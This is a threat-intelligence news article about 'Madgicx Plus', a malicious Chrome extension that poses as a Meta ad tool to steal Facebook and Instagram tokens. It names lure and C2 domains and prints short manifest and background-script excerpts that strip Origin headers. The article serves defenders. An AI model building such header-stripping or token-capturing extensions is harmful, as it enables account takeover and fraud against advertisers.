Malicious Chrome Extension Attacking Users to Steal Meta Login Credentials

A novel malicious Chrome extension has been uncovered targeting digital marketers by masquerading as a productivity tool for Meta ad campaigns.

Dubbed “Madgicx Plus,” this extension is distributed through a network of deceptive websites posing as legitimate AI-driven advertising platforms.

Rather than optimizing ad performance, the extension leverages powerful browser permissions to hijack user sessions and exfiltrate login tokens for Facebook and Instagram.

The campaign’s operators have repurposed infrastructure from previous malicious extensions, demonstrating an evolving threat that adapts social engineering lures to current digital marketing trends.

The extension’s distribution channels deploy professionally crafted domains—such as privacy-shield.world and madgicxads.world—that mimic real analytics and optimization services.

Visitors are encouraged to install the extension under the pretense of boosting campaign ROI, only to grant it full host access and network request interception capabilities.

Cybereason analysts noted that once installed, the extension injects content scripts into every visited page, enabling real-time harvesting of form inputs and session cookies.

This level of access allows attackers to bypass content security policies and interact directly with Meta’s internal APIs.

Impact assessments reveal that compromised credentials can lead to unauthorized modifications of advertising budgets, creation of new campaigns, and full takeover of business accounts.

Small and medium enterprises, often lacking dedicated security teams, are at particularly high risk as they routinely delegate ad management to third-party tools.

The ease with which the extension strips the HTTP Origin header from outbound requests further illustrates its capacity for seamless man-in-the-browser attacks.

Victims may remain unaware until they observe unexplained billing charges or missing campaigns in their Meta Business Manager dashboards.

Under the guise of a legitimate tool, the extension’s manifest.json grants host_permissions for “” and leverages declarativeNetRequest rules to remove origin headers from any request matching the pattern “caller=ext.”

This capability, combined with background scripts that forward stolen tokens to a command-and-control server, underpins a sophisticated data theft framework.

The real IP addresses behind the Cloudflare proxies were identified through favicon hash analysis and Shodan queries, leading to infrastructure owned by VDSina—an ISP previously linked to hosting malicious resources.

Infection Mechanism

Upon installation, the extension’s manifest triggers automatic injection of a background script that monitors browser navigation events.

The snippet below illustrates how the extension intercepts form submissions to capture authentication tokens:-

// manifest.json excerpt
{
  "host_permissions": [""],
  "permissions": ["declarativeNetRequest","declarativeNetRequestWithHostAccess"],
  "content_scripts": [
    {
      "matches": ["*://*/*"],
      "js": ["background.iife.js"]
    }
  ]
}

The core of the attack resides in background.iife.js, which establishes listeners for XHR requests to Facebook’s OAuth endpoints.

When the user logs in, the script extracts the “access_token” from the JSON response and stores it in local storage before relaying it to the malicious C2 domain at madgicx-plus.com.

By stripping the Origin header with a declarativeNetRequest rule, the extension evades same-origin checks and seamlessly integrates stolen tokens into attacker-controlled sessions:-

// background.iife.js snippet
chrome.webRequest.onBeforeSendHeaders.addListener(details => {
  details.requestHeaders = details.requestHeaders.filter(h => h.name !== 'Origin');
  return { requestHeaders: details.requestHeaders };
}, {urls: ["*://*.facebook.com/*"]}, ["blocking","requestHeaders"]);

Through these mechanisms, attackers gain persistent access to the victim’s Meta environment without triggering standard browser alerts.

The extension’s combination of broad permissions, CSP bypass techniques, and covert token exfiltration marks a significant escalation in browser-based threats against social media advertises.

Security teams should prioritize extension audits, restrict unnecessary permissions, and isolate advertising workflows to dedicated profiles to mitigate such risks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.